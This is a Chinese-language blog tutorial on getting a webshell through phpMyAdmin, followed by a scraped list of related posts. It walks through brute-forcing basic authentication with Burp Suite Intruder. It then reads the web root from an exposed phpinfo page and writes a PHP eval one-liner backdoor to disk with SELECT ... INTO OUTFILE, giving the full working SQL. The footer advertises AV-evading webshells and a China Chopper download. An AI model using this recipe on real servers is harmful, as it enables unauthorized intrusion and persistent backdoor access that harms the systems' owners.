之前的两篇WEBSHELL姿势谈到了两种拿SHELL的方法(上传+解析漏洞、http-put/move方法),当然有时最简单的时候就是上传无限制,或者通过改filename后缀实现。这次我们要实验的就是通过phpMyAdmin来实现。

一般来说要利用SQL来实现一句话,有如下几种情况:

1.存在sql注入,在没有字符处理时可直接写入一句话(如Select '<? php eval($_POST[cmd]);?>' into outfile 'F:/wwwroot/shell.php');

2.利用phpMyAdmin写入一句话(前提登录phpMyAdmin)

3.其次利用注入登录应用系统,发现应用系统的其它漏洞,完成getshell。

0x00 实验环境

1.一个安装phpMyAdmin的windows环境

2.使用工具burpsuit(可使用其他相关工具替换)

0x01 发现phpMyAdmin

输入ip,我们发现应用是一个后台登录系统,使用burpsuit代理并将目标网站发送至spider进行网页爬取,在target中查看网站目录(适当调整fitler可显示多个目录)

0x02 暴力破解

我们访问目标网站http://10.1.1.10/phpMyAdmin,发现它需要认证(basic认证)

我们先尝试一下密码,并使用burpsuit查看发送的包信息

其中,YWRtaW46MTIzNDU2就是我们输入的用户名和密码BASE64格式,解码后为:admin:123456

我们直接把数据包发送至intruder模块就行暴力破解,配置如下:

1.仅设置YWRtaW46MTIzNDU2为payload maker

2.设置payload type为Custom iterator

3.通过load加载常用用户名进position1列表,配置position separator为:(冒号)

4.切换到position2,通过load加载常用口令进position2列表

5.在payload process中添加Encode-Base64 encode

6.start attack.

通过status,我们定位到一个200 OK的包,解码得到root:1234567890,登录

0x03 写入一句话

在写一句话之前,我们要先了解mysql写文件的基本语句:

select * from test into outfile '/xxx/xxx/test.txt'

写文件我们大致了解了,但是我们还缺少应用的路径,这里我们通过暴露的phpinfo文件得到了应用路径C:/xampp/xampp/htdocs

最后我们的一句话木马sql如下:

Drop TABLE IF EXISTS temp; //如果存在temp就删掉
Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段
Insert INTO temp (cmd) VALUES("<?php @eval($_POST['6um1n']);?>"); //把php一句话木马插入到temp表
Select cmd from temp into out file 'C:/xampp/xampp/htdocs/shell.php'; //查询temp表中的一句话并把结果导入到shell.php
Drop TABLE IF EXISTS temp; //删除temp#以上也可简化为:
#Select "<?php @eval($_POST['6um1n']);?>" into outfile 'C:/xampp/xampp/htdocs/shell.php'

执行sql

0x04 菜刀

webshell至此完结,之后还可以完成提权等测试,这里就不再继续了。

WEBSHELL姿势之SQL一句话相关推荐

  1. 过新版狗php一句话,整理的最新WebSHell (php过狗一句话,过狗菜刀,2016过狗一句话,2016php免杀一句话)...

    整理的最新WebSHell (php过狗一句话,过狗菜刀,2016过狗一句话,2016php免杀一句话) 发布时间:2020-06-20 00:54:04 来源:51CTO 阅读:3175 作者:gu ...

  2. 如何以正确地姿势AK SQL查询50题(精华篇)

    前言------ AK: ALL Killed 这学期学数据库系统概论,作为一个初学者,必须先熟练掌握SQL的基本查询语句,在完成了老师的SQL50题之后,我把我自己地AK姿势记录下来, 便于回忆之余 ...

  3. 整理的最新WebSHell (php过狗一句话,过狗菜刀,2016过狗一句话,2016php免杀一句话)

    中国菜刀下载,基于原版中国菜刀优化版20160309. 下载地址: http://download.csdn.net/detail/settoken/9457567

  4. SQL注入上传一句话木马

    利用sql注入上传一句话木马 导读 1. sql注入的危害 2. 文件写入 2.1 webshell.一句话木马.后门 webshell(大马) 一句话木马 木马文件的危害 2.2 文件写入的前提条件 ...

  5. linux脚本读取mssql数据库,WebShell通过SQL语句管理MSSQL

    最近在做一个网络安全相关项目的渗透测试,在拿到了服务器的webshell之后,需要进一步渗透,服务器上有较高权限的软件只剩SQL Server 2005了,而且在webshell中通过SQL Serv ...

  6. sqlmap 连接mysql_sqlmap从入门到精通-第三章-4-4-使用sqlmap直连MSSQL获取webshell或权限...

    4.4 使用sqlmap直连MSSQL获取webshell或权限 在某些情况下可能不存在SQL注入漏洞,但是通过发现目标源代码泄露,备份泄露,文件包含等方法获取了数据库服务器的IP地址,数据库账户和密 ...

  7. 使用sqlmap直连数据库获取webshell

    在有些场景下,需要通过mysql直接连接来获取权限,例如通过暴力破解.嗅探等方法获取了账号及口令,服务器有可能未开放web服务. 0X001 适用场景 1.获取了Mysql数据库root账号以及密码. ...

  8. 信安小白,一篇博文讲明白上传漏洞——获得shop靶机的Webshell

    实验环境:Win7 上传漏洞--获得shop靶机的Webshell 系列博文 前言 Webshell--脚本攻击工具 1. Webshell 工具举例 2. 如何获得Webshell 3. 上传检测 ...

  9. webshell原理

    (源自摘抄整理) https://www.91ri.org/11494.html Webshell实现与隐藏探究 一.什么是webshell webshell简介 webshell,顾名思义:web指 ...

最新文章

  1. 创业3年!猎头加价50%!一半中层骨干被挖走,研发就剩2个应届生!绝户套餐真够狠的!...
  2. Visual Transformers: Token-based Image Representation and Processing for Computer Vision
  3. JQuery:JQuery添加元素
  4. 外部中断---STM32F1
  5. maven POM.xml内的标签大全详解
  6. 创建一个守护进程来监听服务进程的异常状态_用 C# 来守护 Python 进程
  7. 老年手机英文改中文_不服来战:“老年人才用9键!”
  8. Maven学习总结(53)——利用Maven插件构建镜像进行持续交付中的版本号管理
  9. jQuery.获取子节点
  10. 嵌入式大佬 | 嵌入式C语言知识点万字总结
  11. 立即收藏!2019前端工程师如何应对裁员潮?
  12. 北京双线机房的优缺点分析
  13. 湖南大学计算机专业推免生,湖南大学2018年招收推荐免试攻读研究生简章
  14. 以前收入高,但毫无上进心,40岁一身房贷,被裁后找个小公司,天天担心试用期过不了,焦虑地睡不着!...
  15.  php怎么做注册短信验证码
  16. 在线ico图标制作、python代码实现ico格式转换
  17. Unhandled Exception:System.DllNotFoundException: Unable to load DLLquot;**quot;:找不到指定的模块
  18. 原生Android设置sim卡锁定,开启SIM卡密码保护
  19. 【csdn涨粉秘籍】亲身体验从一年才涨80粉到20天涨粉800多,规则内设置,一个步骤助你快速涨粉
  20. 中枢模式发生器(CPG)

热门文章

  1. QPushButton 实现保持按下效果(转载​​)
  2. ios 微信端 video 标签 兼容问题
  3. 最近20年天文学有什么重大的进展
  4. 小米手机超长续航优化的设置
  5. 华为OD社招面试(技术二面完)--总结复盘
  6. k8s集群安装之kubeadm
  7. 【MMDetection 源码解读之yolov3】Neck - FPN
  8. 最美圣诞树,用Python画棵雪夜圣诞树送给你
  9. 木子-前端-谷歌页面等调试时总是报No Found 404 错误(编码格式不识别问题导致的)
  10. Centos6安装SGE以及集群配置